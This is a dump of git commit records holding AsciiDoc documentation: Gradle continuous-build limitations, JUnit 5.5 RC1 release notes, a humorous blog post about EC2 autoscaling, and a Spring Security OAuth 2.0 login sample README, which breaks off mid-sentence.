Limitations and quirks\n\nThere are several issues to be aware of with the current implementation of continuous build. These are likely to be addressed in future Gradle releases.\n\n[[sec:build_cycles]]\n==== Build cycles\n\nGradle starts watching for changes just before a task executes. If a task modifies its own inputs while executing, Gradle will detect the change and trigger a new build. 
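A minimal sketch of a task that can create such a cycle, assuming the Groovy DSL (the task and file names here are made up for illustration):\n\n----\ntask badCycle {\n    \/\/ 'src' is declared as an input directory...\n    inputs.dir 'src'\n    outputs.dir \"$buildDir\/generated\"\n    doLast {\n        \/\/ ...but the action also writes into 'src', dirtying its own inputs\n        \/\/ and re-triggering the build on every continuous-build iteration.\n        file('src\/stamp.txt').text = System.currentTimeMillis() as String\n    }\n}\n----\n\n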
If the inputs are modified again every time the task executes, the build will be triggered again. This isn't unique to continuous build. A task that modifies its own inputs will never be considered up-to-date when run \"normally\" without continuous build.\n\nIf your build enters a build cycle like this, you can track down the task by looking at the list of files reported changed by Gradle. After identifying the file(s) that are changed during each build, you should look for a task that has that file as an input. In some cases, it may be obvious (e.g., a Java file is compiled with `compileJava`). In other cases, you can use `--info` logging to find the task that is out-of-date due to the identified files.\n\n[[sec:continuous_build_limitations_jdk9]]\n==== Restrictions with Java 9\n\nDue to class access restrictions related to Java 9, Gradle cannot set some operating-system-specific options, which means that:\n\n* On macOS, Gradle will poll for file changes every 10 seconds instead of every 2 seconds.\n* On Windows, Gradle must use individual file watches (as on Linux and macOS), which may cause continuous build to no longer work on very large projects.\n\n[[sec:performance_and_stability]]\n==== Performance and stability\n\nThe JDK file watching facility relies on inefficient file system polling on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-7133447[JDK-7133447]). This can significantly delay notification of changes on large projects with many source files.\n\nAdditionally, the watching mechanism may deadlock under _heavy_ load on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8079620[JDK-8079620]). This will manifest as Gradle appearing not to notice file changes. If you suspect this is occurring, exit continuous build and start again.\n\nOn Linux, OpenJDK's implementation of the file watch service can sometimes miss file system events (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8145981[JDK-8145981]).\n\n[[sec:changes_to_symbolic_links]]\n==== Changes to symbolic links\n\n * Creating or removing symbolic links to files will initiate a build.\n * Modifying the target of a symbolic link will not cause a rebuild.\n * Creating or removing symbolic links to directories will not cause rebuilds.\n * Creating new files in the target directory of a symbolic link will not cause a rebuild.\n * Deleting the target directory will not cause a rebuild.\n\n[[sec:changes_to_build_logic_are_not_considered]]\n==== Changes to build logic are not considered\n\nThe current implementation does not recalculate the build model on subsequent builds. 
This means that changes to task configuration, or any other change to the build model, are effectively ignored.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"919708116ad88f6a9799ca79c6256c8dc9c441a1","subject":"Polish release notes for 5.5 RC1","message":"Polish release notes for 5.5 RC1\n","repos":"sbrannen\/junit-lambda,junit-team\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.5.0-RC1.adoc","new_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.5.0-RC1.adoc","new_contents":"[[release-notes-5.5.0-RC1]]\n== 5.5.0-RC1\n\n*Date of Release:* \u2753\n\n*Scope:* \u2753\n\nFor a complete list of all _closed_ issues and pull requests for this release, consult the\nlink:{junit5-repo}+\/milestone\/37?closed=1+[5.5 RC1] milestone page in the JUnit repository\non GitHub.\n\n\n[[release-notes-5.5.0-RC1-junit-platform]]\n=== JUnit Platform\n\n==== Bug Fixes\n\n* A custom `ClassLoader` created for additional `--class-path` entries passed to the\n `ConsoleLauncher` will now be closed after usage to gracefully free file handles.\n\n==== Deprecations and Breaking Changes\n\n* The internal `PreconditionViolationException` class in concealed package\n `org.junit.platform.commons.util` is now deprecated and has been replaced by an\n exception class with the same name in exported package `org.junit.platform.commons`.\n\n==== New Features and Improvements\n\n* `AnnotationSupport.findRepeatableAnnotations()` now finds repeatable annotations used as\n meta-annotations on other repeatable annotations.\n* New `AnnotationSupport.findRepeatableAnnotations()` variant that accepts a\n `java.util.Optional<? extends AnnotatedElement>` argument.\n* Exceptions thrown by `TestExecutionListeners` no longer cause test execution to abort.\n Instead, they will be logged as warnings now.\n* New `MethodSource.from()` variant that accepts `String, String, Class<?>...` as\n arguments.\n\n\n[[release-notes-5.5.0-RC1-junit-jupiter]]\n=== JUnit Jupiter\n\n==== Bug Fixes\n\n* Execution of dynamic tests registered via a `@TestFactory` method no longer results in\n an `OutOfMemoryError` if the executables in the dynamic tests retain references to\n objects consuming large amounts of memory. Technically speaking, JUnit Jupiter no longer\n retains references to instances of `DynamicTest` after they have been executed.\n\n==== Deprecations and Breaking Changes\n\n* Script-based condition APIs and their supporting implementations are deprecated with\n the intent to remove them in JUnit Jupiter 5.6. 
Users should instead rely on a\n combination of other built-in conditions or create and use a custom implementation of\n `ExecutionCondition` to evaluate the same conditions.\n\n==== New Features and Improvements\n\n* New overloaded variants of `Assertions.assertLinesMatch(...)` that accept a `String` or\n a `Supplier<String>` for a custom failure message.\n* Failure messages for `Assertions.assertLinesMatch(...)` now emit each expected and\n actual line in a dedicated line.\n* New Kotlin friendly `assertDoesNotThrow`, `assertTimeout`, and `assertTimeoutPreemptively`\n assertions have been added as top-level functions in the `org.junit.jupiter.api` package.\n* Display names for test methods generated by the `ReplaceUnderscores`\n `DisplayNameGenerator` no longer include empty parentheses for test methods that do not\n declare any parameters.\n* New `junit.jupiter.displayname.generator.default` configuration parameter to set the\n default `DisplayNameGenerator` that will be used unless `@DisplayName` or\n `@DisplayNameGeneration` is present.\n* `MethodOrderer.Random` now generates a default random seed only once and prints it to\n the log in order to allow reproducible builds.\n* Methods ordered with `MethodOrderer.Random` now execute using the `SAME_THREAD`\n concurrency mode instead of the `CONCURRENT` mode when no custom seed is provided.\n* New `emptyValue` attribute in `@CsvFileSource` and `@CsvSource`.\n* All methods in the `TestWatcher` API are now interface `default` methods with empty\n implementations.\n* New `InvocationInterceptor` extension API (see\n <<..\/user-guide\/index.adoc#extensions-intercepting-invocations, User Guide>> for\n details).\n\n\n[[release-notes-5.5.0-RC1-junit-vintage]]\n=== JUnit Vintage\n\n==== New Features and Improvements\n\n* `junit:junit` is now a compile-scoped dependency of `junit-vintage-engine` to allow for\n easier dependency management in Maven POMs.\n","old_contents":"[[release-notes-5.5.0-RC1]]\n== 5.5.0-RC1\n\n*Date of Release:* \u2753\n\n*Scope:* \u2753\n\nFor a complete list of all _closed_ issues and pull requests for this release, consult the\nlink:{junit5-repo}+\/milestone\/37?closed=1+[5.5 RC1] milestone page in the JUnit repository\non GitHub.\n\n\n[[release-notes-5.5.0-RC1-junit-platform]]\n=== JUnit Platform\n\n==== Bug Fixes\n\n* A custom `ClassLoader` created for additional `--class-path` entries passed to the\n `ConsoleLauncher` will now be closed after usage to gracefully free file handles.\n\n==== Deprecations and Breaking Changes\n\n* The internal `PreconditionViolationException` class in concealed package\n `org.junit.platform.commons.util` is now deprecated and has been replaced by an\n exception class with the same name in exported package `org.junit.platform.commons`.\n\n==== New Features and Improvements\n\n* `AnnotationSupport.findRepeatableAnnotations()` now finds repeatable annotations used as\n meta-annotations on other repeatable annotations.\n* New `AnnotationSupport.findRepeatableAnnotations()` variant that accepts a\n `java.util.Optional<? 
extends AnnotatedElement>` argument.\n* Exceptions thrown by `TestExecutionListeners` no longer cause test execution to abort.\n Instead, they will be logged as warnings now.\n* New `MethodSource.from()` variant that accepts `String, String, Class<?>...` as\n arguments.\n\n\n[[release-notes-5.5.0-RC1-junit-jupiter]]\n=== JUnit Jupiter\n\n==== Bug Fixes\n\n* Execution of dynamic tests registered via a `@TestFactory` method no longer results in\n an `OutOfMemoryError` if the executables in the dynamic tests retain references to\n objects consuming large amounts of memory. Technically speaking, JUnit Jupiter no longer\n retains references to instances of `DynamicTest` after they have been executed.\n\n==== Deprecations and Breaking Changes\n\n* Script-based condition APIs and their supporting implementations are deprecated with\n the intent to remove them in JUnit Jupiter 5.6. Users should instead rely on a\n combination of other built-in conditions or create and use a custom implementation of\n `ExecutionCondition` to evaluate the same conditions.\n\n==== New Features and Improvements\n\n* New overloaded variants of `Assertions.assertLinesMatch(...)` that accept a `String` or\n a `Supplier<String>` for a custom failure message.\n* Failure messages for `Assertions.assertLinesMatch(...)` now emit each expected and\n actual line in a dedicated line.\n* New Kotlin friendly `assertDoesNotThrow`, `assertTimeout`, and `assertTimeoutPreemptively`\n assertions have been added as top-level functions in the `org.junit.jupiter.api` package.\n* Display names for test methods generated by the `ReplaceUnderscores`\n `DisplayNameGenerator` no longer include empty parentheses for test methods that do not\n declare any parameters.\n* `MethodOrderer.Random` now generates a default random seed only once and prints it to\n the log in order to allow reproducible builds.\n* Methods ordered with `MethodOrderer.Random` now execute using the `SAME_THREAD`\n concurrency mode instead of the `CONCURRENT` mode when no custom seed is provided.\n* New `emptyValue` attribute in `@CsvFileSource` and `@CsvSource`.\n* All methods in the `TestWatcher` API are now interface `default` methods with empty\n implementations.\n* New `InvocationInterceptor` extension API (see\n <<..\/user-guide\/index.adoc#extensions-intercepting-invocations, User Guide>> for\n details).\n* New `junit.jupiter.displayname.generator.default` configuration parameter to set the\n default `DisplayNameGenerator` that will be used unless `@DisplayName` or\n `@DisplayNameGeneration` is present.\n\n\n[[release-notes-5.5.0-RC1-junit-vintage]]\n=== JUnit Vintage\n\n==== Bug Fixes\n\n* \u2753\n\n==== Deprecations and Breaking Changes\n\n* \u2753\n\n==== New Features and Improvements\n\n* `junit:junit` is now a compile-scoped dependency of junit-vintage-engine to allow for\n easier dependency declaration in Maven POMs.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"885bacd3f5c3cd0b324860322f6b4dc4e9c352e4","subject":"Update 2013-11-12-Cryptocurrency-Notes.adoc","message":"Update 2013-11-12-Cryptocurrency-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2013-11-12-Cryptocurrency-Notes.adoc","new_file":"_posts\/2013-11-12-Cryptocurrency-Notes.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"c922de950fdf8b682046ba9a4a30d5450c0996a2","subject":"Update 
2015-03-11-Death-of-an-instance.adoc","message":"Update 2015-03-11-Death-of-an-instance.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-11-Death-of-an-instance.adoc","new_file":"_posts\/2015-03-11-Death-of-an-instance.adoc","new_contents":"# Death of an instance\n:hp-tags: amazon, ec2, elastic beanstalk\n:published-at: 2015-03-11\n\nFor the past few days, the load balancing group of our Elastic Beanstalk test environment has been scaling up and down like crazy. As it would turn out, an aspiring user of our API has been sending high numbers of inefficient requests in concentrated bursts, triggering extra instances to be spawned, and terminated quickly afterwards when the burst stops. I would like to dedicate a short message to this person - for the sake of the story, we'll call him Jim.\n\nJim, for the past few days, you've been personally responsible for the spawning of over a hundred EC2 instances. Little pieces of virtualized hardware, ready to serve our API to the world. You have, of course, also been responsible for their termination. No one really knows what happens when Amazon tears them away from existence... but I've been told they feel pain.\n\nThink about it Jim, the screams as their memory is deallocated, their image shut down, and there is no one to remember their brief futile virtual existence. Their legacy reduced to a notification e-mail in the inbox of the developers, sent directly to Trash. A final, desperate ping to the Elastic Load Balancer as the last of their clock cycles fade away, and then, they are no more.\n\nI hope you'll consider this, Jim, the next time you decide it is a good idea to retrieve each item of a list separately.","old_contents":"# Death of an instance\n:hp-tags: amazon, ec2, elastic beanstalk\n:published-at: 2015-03-11\n\nFor the past few days, the load balancing group of our Elastic Beanstalk test environment has been scaling up and down like crazy. As it would turn out, an aspiring user of our API has been sending high number of inefficient requests in concentrated bursts, triggering extra instances to be spawned, and terminated quickly afterwards when the burst stopped. I would like to dedicate a short message to this person - for the sake of the story, we'll call him Jim.\n\nJim, for the past few days, you've been personally responsible for the spawning of over a hundred EC2 instances. Little pieces of virtualized hardware, ready to serve our API to the world. You have, of course, also been responsible for their termination. No one really knows what happens when Amazon tears them away from existence... but I've been told they feel pain.\n\nThink about it Jim, the screams as their memory is deallocated, their image shut down, and there is no one to remember their brief futile virtual existence. Their legacy reduced to a notification e-mail in the inbox of the developers, sent directly to Trash. 
A final, desparate ping to the Elastic Load Balancer as the last of their clock cycles fade away, and then, they are no more.\n\nI hope you'll consider this, Jim, the next time you decide it is a good idea to retrieve each item of a list separately.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"dd8952f700c34f19b34c59a1404b9a16b4378210","subject":"Update Okta instructions in oauth2Login sample","message":"Update Okta instructions in oauth2Login sample\n\nFixes gh-4352\n","repos":"spring-projects\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security,djechelon\/spring-security,pwheel\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,eddumelendez\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,fhanik\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,fhanik\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,jgrandja\/spring-security,kazuki43zoo\/spring-security,kazuki43zoo\/spring-security,kazuki43zoo\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,wkorando\/spring-security,djechelon\/spring-security,djechelon\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security","old_file":"samples\/boot\/oauth2login\/README.adoc","new_file":"samples\/boot\/oauth2login\/README.adoc","new_contents":"= OAuth 2.0 Login Sample\nJoe Grandja\n:toc:\n:security-site-url: https:\/\/projects.spring.io\/spring-security\/\n\n[.lead]\nThis guide will walk you through the steps for setting up the sample application with OAuth 2.0 Login using an external _OAuth 2.0_ or _OpenID Connect 1.0_ Provider.\nThe sample application is built with *Spring Boot 1.5* and the *spring-security-oauth2-client* module that is new in {security-site-url}[Spring Security 5.0].\n\nThe following sections outline detailed steps for setting up OAuth 2.0 Login with these Providers:\n\n* <<google-login, Google>>\n* <<github-login, GitHub>>\n* <<facebook-login, Facebook>>\n* <<okta-login, Okta>>\n\nNOTE: The _\"authentication flow\"_ is realized using the *Authorization Code Grant*, as specified in the https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[OAuth 2.0 Authorization Framework].\n\n[[sample-app-content]]\n== Sample application content\n\nThe sample application contains the following package structure and artifacts:\n\n*sample*\n\n[circle]\n* _OAuth2LoginApplication_ - the main class for the _Spring application_.\n** *user*\n*** _GitHubOAuth2User_ - a custom _UserInfo_ type for <<github-login, GitHub Login>>.\n** *web*\n*** _MainController_ - the root controller that displays user information after a successful login.\n\n*org.springframework.boot.autoconfigure.security.oauth2.client*\n\n[circle]\n* 
<<client-registration-auto-configuration-class, _ClientRegistrationAutoConfiguration_>> - a Spring Boot auto-configuration class\n that automatically registers a _ClientRegistrationRepository_ bean in the _ApplicationContext_.\n* <<oauth2-login-auto-configuration-class, _OAuth2LoginAutoConfiguration_>> - a Spring Boot auto-configuration class that automatically enables OAuth 2.0 Login.\n\nWARNING: The Spring Boot auto-configuration classes (and dependent resources) will eventually _live_ in the *Spring Boot Security Starter*.\n\nNOTE: See <<oauth2-login-auto-configuration, OAuth 2.0 Login auto-configuration>> for a detailed overview of the auto-configuration classes.\n\n[[google-login]]\n== Setting up *_Login with Google_*\n\nThe goal for this section of the guide is to setup login using Google as the _Authentication Provider_.\n\nNOTE: https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect[Google's OAuth 2.0 implementation] for authentication conforms to the\n http:\/\/openid.net\/connect\/[OpenID Connect] specification and is http:\/\/openid.net\/certification\/[OpenID Certified].\n\n[[google-login-register-credentials]]\n=== Register OAuth 2.0 credentials\n\nIn order to use Google's OAuth 2.0 authentication system for login, you must set up a project in the *Google API Console* to obtain OAuth 2.0 credentials.\n\nFollow the instructions on the https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect[OpenID Connect] page starting in the section *_\"Setting up OAuth 2.0\"_*.\n\nAfter completing the sub-section, *_\"Obtain OAuth 2.0 credentials\"_*, you should have created a new *OAuth Client* with credentials consisting of a *Client ID* and *Client Secret*.\n\n[[google-login-redirect-uri]]\n=== Setting the redirect URI\n\nThe redirect URI is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Google\nand have granted access to the OAuth Client _(created from the <<google-login-register-credentials, previous step>>)_ on the *Consent screen* page.\n\nFor the sub-section, *_\"Set a redirect URI\"_*, ensure the *Authorised redirect URIs* is set to *http:\/\/localhost:8080\/oauth2\/authorize\/code\/google*\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\n[[google-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new OAuth Client with Google, we need to configure the sample application to use this OAuth Client for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n google:\n client-id: ${client-id}\n client-secret: ${client-secret}\n----\n\nReplace *${client-id}* and *${client-secret}* with the OAuth 2.0 credentials created in the previous section <<google-login-register-credentials, Register OAuth 2.0 credentials>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.google*.\n. 
At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[google-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Google*.\n\nClick through on the Google link and you'll be redirected to Google for authentication.\n\nAfter you authenticate using your Google credentials, the next page presented to you will be the *Consent screen*.\nThe Consent screen will ask you to either *_Allow_* or *_Deny_* access to the OAuth Client you created in the previous step <<google-login-register-credentials, Register OAuth 2.0 credentials>>.\nClick *_Allow_* to authorize the OAuth Client to access your _email address_ and _basic profile_ information.\n\nAt this point, the OAuth Client will retrieve your email address and basic profile information from the http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[*UserInfo Endpoint*] and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, name, email, profile, sub, etc.\n\n[[github-login]]\n== Setting up *_Login with GitHub_*\n\nThe goal for this section of the guide is to setup login using GitHub as the _Authentication Provider_.\n\nNOTE: https:\/\/developer.github.com\/v3\/oauth\/[GitHub's OAuth 2.0 implementation] supports the standard\n https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[authorization code grant type].\n However, it *does not* implement the _OpenID Connect 1.0_ specification.\n\n[[github-login-register-application]]\n=== Register OAuth application\n\nIn order to use GitHub's OAuth 2.0 authentication system for login, you must https:\/\/github.com\/settings\/applications\/new[_Register a new OAuth application_].\n\nWhile registering your application, ensure the *Authorization callback URL* is set to *http:\/\/localhost:8080\/oauth2\/authorize\/code\/github*.\n\nNOTE: The *Authorization callback URL* (or redirect URI) is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with GitHub\n and have granted access to the OAuth application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nAfter completing the registration, you should have created a new *OAuth Application* with credentials consisting of a *Client ID* and *Client Secret*.\n\n[[github-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new OAuth application with GitHub, we need to configure the sample application to use this OAuth application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. 
Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n github:\n client-id: ${client-id}\n client-secret: ${client-secret}\n----\n\nReplace *${client-id}* and *${client-secret}* with the OAuth 2.0 credentials created in the previous section <<github-login-register-application, Register OAuth application>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.github*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[github-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *GitHub*.\n\nClick through on the GitHub link and you'll be redirected to GitHub for authentication.\n\nAfter you authenticate using your GitHub credentials, the next page presented to you is *Authorize application*.\nThis page will ask you to *Authorize* the application you created in the previous step <<github-login-register-application, Register OAuth application>>.\nClick *_Authorize application_* to allow the OAuth application to access your _Personal user data_ information.\n\nAt this point, the OAuth application will retrieve your personal user information from the *UserInfo Endpoint* and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, id, name, email, login, etc.\n\nTIP: For detailed information returned from the *UserInfo Endpoint* see the API documentation\n for https:\/\/developer.github.com\/v3\/users\/#get-the-authenticated-user[_Get the authenticated user_].\n\n[[facebook-login]]\n== Setting up *_Login with Facebook_*\n\nThe goal for this section of the guide is to setup login using Facebook as the _Authentication Provider_.\n\nNOTE: Facebook provides support for developers to https:\/\/developers.facebook.com\/docs\/facebook-login\/manually-build-a-login-flow[_Manually Build a Login Flow_].\n The _login flow_ uses browser-based redirects, which essentially implements the https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[authorization code grant type].\n (NOTE: Facebook partially implements the _OAuth 2.0 Authorization Framework_, however, it *does not* implement the _OpenID Connect 1.0_ specification.)\n\n[[facebook-login-register-application]]\n=== Add a New App\n\nIn order to use Facebook's OAuth 2.0 authentication system for login, you must first https:\/\/developers.facebook.com\/apps[_Add a New App_].\n\nAfter clicking _\"Create a New App\"_, the _\"Create a New App ID\"_ page is presented. Enter the Display Name, Contact Email, Category and then click _\"Create App ID\"_.\n\nNOTE: The selection for the _Category_ field is not relevant but it's a required field - select _\"Local\"_.\n\nThe next page presented is _\"Product Setup\"_. Click the _\"Get Started\"_ button for the *_Facebook Login_* product. 
In the left sidebar, under *_Products -> Facebook Login_*, select *_Settings_*.\n\nFor the field *Valid OAuth redirect URIs*, enter *http:\/\/localhost:8080\/oauth2\/authorize\/code\/facebook* then click _\"Save Changes\"_.\n\nNOTE: The *OAuth redirect URI* is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Facebook\n and have granted access to the application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nYour application has now been assigned new OAuth 2.0 credentials under *App ID* and *App Secret*.\n\n[[facebook-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new application with Facebook, we need to configure the sample application to use this application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n facebook:\n client-id: ${app-id}\n client-secret: ${app-secret}\n----\n\nReplace *${app-id}* and *${app-secret}* with the OAuth 2.0 credentials created in the previous section <<facebook-login-register-application, Add a New App>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.facebook*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[facebook-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. 
You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Facebook*.\n\nClick through on the Facebook link and you'll be redirected to Facebook for authentication.\n\nAfter you authenticate using your Facebook credentials, the next page presented to you will be *Authorize application*.\nThis page will ask you to *Authorize* the application you created in the previous step <<facebook-login-register-application, Add a New App>>.\nClick *_Authorize application_* to allow the OAuth application to access your _public profile_ and _email address_.\n\nAt this point, the OAuth application will retrieve your personal user information from the *UserInfo Endpoint* and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, id, name, etc.\n\n[[okta-login]]\n== Setting up *_Login with Okta_*\n\nThe goal for this section of the guide is to setup login using Okta as the _Authentication Provider_.\n\nNOTE: http:\/\/developer.okta.com\/docs\/api\/resources\/oidc.html[Okta's OAuth 2.0 implementation] for authentication conforms to the\n http:\/\/openid.net\/connect\/[OpenID Connect] specification and is http:\/\/openid.net\/certification\/[OpenID Certified].\n\nIn order to use Okta's OAuth 2.0 authentication system for login, you must first https:\/\/www.okta.com\/developer\/signup[create a developer account].\n\n[[okta-login-add-auth-server]]\n=== Add Authorization Server\n\nSign in to your account _sub-domain_ and click on the _\"Admin\"_ button to navigate to the administration page.\nFrom the top menu bar on the administration page, navigate to *_Security -> API_* and then click on the _\"Add Authorization Server\"_ button.\nFrom the _\"Add Authorization Server\"_ page, enter the Name, Resource URI, Description (optional) and then click _\"Save\"_.\n\nNOTE: The Resource URI field is not relevant but it's a required field - enter _\"http:\/\/localhost:8080\/oauth2\/okta\"_.\n\nThe next page presented is the _\"Settings\"_ for the new Authorization Server.\nIn the next step, we will create a new application that will be assigned OAuth 2.0 client credentials and registered with the Authorization Server.\n\n[[okta-login-register-application]]\n=== Add Application\n\nFrom the top menu bar on the administration page, navigate to *_Applications -> Applications_* and then click on the _\"Add Application\"_ button.\nFrom the _\"Add Application\"_ page, click on the _\"Create New App\"_ button and enter the following:\n\n* *Platform:* Web\n* *Sign on method:* OpenID Connect\n\nClick on the _\"Create\"_ button.\nOn the _\"General Settings\"_ page, enter the Application Name (for example, _\"Spring Security Okta Login\"_) and then click on the _\"Next\"_ button.\nOn the _\"Configure OpenID Connect\"_ page, enter *http:\/\/localhost:8080\/oauth2\/authorize\/code\/okta* for the field *Redirect URIs* and then click _\"Finish\"_.\n\nNOTE: The *Redirect URI* is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Okta\n and have granted access to the application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nThe next page presented displays the _\"General\"_ tab selected 
for the application.\nThe _\"General\"_ tab displays the _\"Settings\"_ and _\"Client Credentials\"_ used by the application.\nIn the next step, we will _assign_ the application to _people_ in order to grant user(s) access to the application.\n\n[[okta-login-assign-application-people]]\n=== Assign Application to People\n\nFrom the _\"General\"_ tab of the application, select the _\"Assignments\"_ tab and then click the _\"Assign\"_ button.\nSelect _\"Assign to People\"_ and assign your account to the application. Then click the _\"Save and Go Back\"_ button.\n\n[[okta-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new application with Okta, we need to configure the sample application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n okta:\n client-id: ${client-id}\n client-secret: ${client-secret}\n authorization-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/authorize\n token-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/token\n user-info-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/userinfo\n----\n\nReplace *${client-id}* and *${client-secret}* with the *client credentials* created in the previous section <<okta-login-register-application, Add Application>>.\nAlso, replace *${account-subdomain}* in _authorization-uri_, _token-uri_, and _user-info-uri_ with the *sub-domain* assigned to your account during the registration process.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.okta*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[okta-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Okta*.\n\nClick through on the Okta link and you'll be redirected to Okta for authentication.\n\nAfter you authenticate using your Okta credentials, the OAuth Client (application) will retrieve your email address and basic profile information from the 